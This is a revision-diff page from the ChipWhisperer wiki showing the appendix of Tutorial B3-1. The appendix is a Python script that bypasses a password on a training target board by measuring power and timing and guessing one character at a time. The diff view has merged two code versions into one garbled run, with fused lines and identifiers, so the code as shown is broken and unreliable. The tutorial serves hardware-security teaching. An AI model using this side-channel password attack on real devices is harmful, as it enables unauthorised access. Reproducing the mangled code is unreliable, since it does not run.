As of August 2020 the site you are on ( is deprecated, and content is now at


Jump to: navigation, search

Tutorial B3-1 Timing Analysis with Power for Password Bypass

1,749 bytes removed, 13:57, 23 September 2017
Appendix: Completed Timing Attack Script
= Appendix: Completed Timing Attack Script =
The <code>run()</code> function at the end of the tutorial might look something like the following:
<presyntaxhighlight lang=python>"""This script is an example of a timing attack on a simple password checker. It is the result of Tutorial B3-1 from the ChipWhisperer Wiki.""" import chipwhisperer as cwfrom chipwhisperer.capture.auxiliary.ResetCW1173Read import ResetCW1173 # GUI compatibilitytry: def runscope = self.scope target = aux_list = self.aux_listexcept NameError: pass # Set up scopescope.gain.gain = 45scope.adc.samples = 2000scope.adc.offset = 0scope.adc.basic_mode = "rising_edge"scope.clock.clkgen_freq = 7370000scope.clock.adc_src = "clkgen_x4"scope.trigger.triggers = "tio4" = "serial_rx" = "serial_tx" = "clkgen" # Set up targettarget.key_cmd = ""target.go_cmd = "h0px3\n"target.output_cmd = "" # Set up aux module to reset target before captureresetter = ResetCW1173(xmega=True, delay_ms=1200)aux_list.register(resetter.resetThenDelay, "before_trace") # Test one capturecw.captureN(self.scope,, None, self.aux_list, self.ktp, 1)trace = scope.getLastTrace()print trace # Crack the first letterpassword = ''trylist = 'abcdefghijklmnopqrstuvwxyz0123456789' for i in range(5): for c in trylist: # This is the function that gets called when Get a power trace using our script startsnext attempt nextPass = password + '{}'.format(c) + "\n" target.go_cmd = nextPass cw.captureN(self.scope,, None, self.aux_list, self.ktp, 1)
# First: set up Grab the basics and connect to the CW-Litetrace self.api.setParameter(['Generic Settings', 'Scope Module', 'ChipWhisperer/OpenADC']) self.api.setParameter(['Generic Settings', 'Target Module', 'Simple Serial']) self.api.setParameter(['Generic Settings', 'Trace Format', 'ChipWhisperer/Native']) self.api.setParameter(['Simple Serial', 'Connection', 'ChipWhisperer-Lite']) self.api.setParameter(['ChipWhisperer/OpenADC', 'Connection', 'ChipWhisperer-Lite']) self.apinextTrace = scope.connectgetLastTrace()
# Next: set up everything we need to connect to the target # Put all of our commands in a list and execute them at the end lstexample = [ # Gain ['OpenADC', 'Gain Setting', 'Setting', 45], # Trigger ['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'], ['OpenADC', 'Trigger Setup', 'Offset', 0], ['OpenADC', 'Trigger Setup', 'Total Samples', 2000], # Clock ['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0], ['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'], ['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None], # Pins ['CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True], ['CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'], ['CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'], ['CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'], # Automatic commands ['Simple Serial', 'Load Key Command', ''], ['Simple Serial', 'Go Command', 'h0px3\n'], ['Simple Serial', 'Output Format', ''], # Auto-reset ['Generic Settings', 'Auxiliary Module', 'Reset AVR/XMEGA via CW-Lite'], ['Aux Settings', 'Reset AVR/XMEGA via CW-Lite', 'Delay (Post-Arm)', 1200], ] #Download all hardware setup parameters for cmd in lstexample: self.api.setParameter(cmd) # Get one capture for fun self.api.capture1() data = self.api.getScope().channels[0].getTrace() print data # Crack the first letter password = '' trylist = 'abcdefghijklmnopqrstuvwxyz0123456789' for i in range(5): for c in trylist: # Get a power trace using our next attempt nextPass = password + '{}'.format(c) self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)]) self.api.capture1() # Grab the trace nextTrace = self.api.getScope().channels[0].getTrace() # Check location 153, 225, etc. If it's too low, we've failed if nextTrace[153 + 72*i] < -0.2: continue # If we got here, we've found the right letter password += c print '{} characters: {}'.format(i+1, password) break</presyntaxhighlight>
Approved_users, bureaucrat, administrator

Navigation menu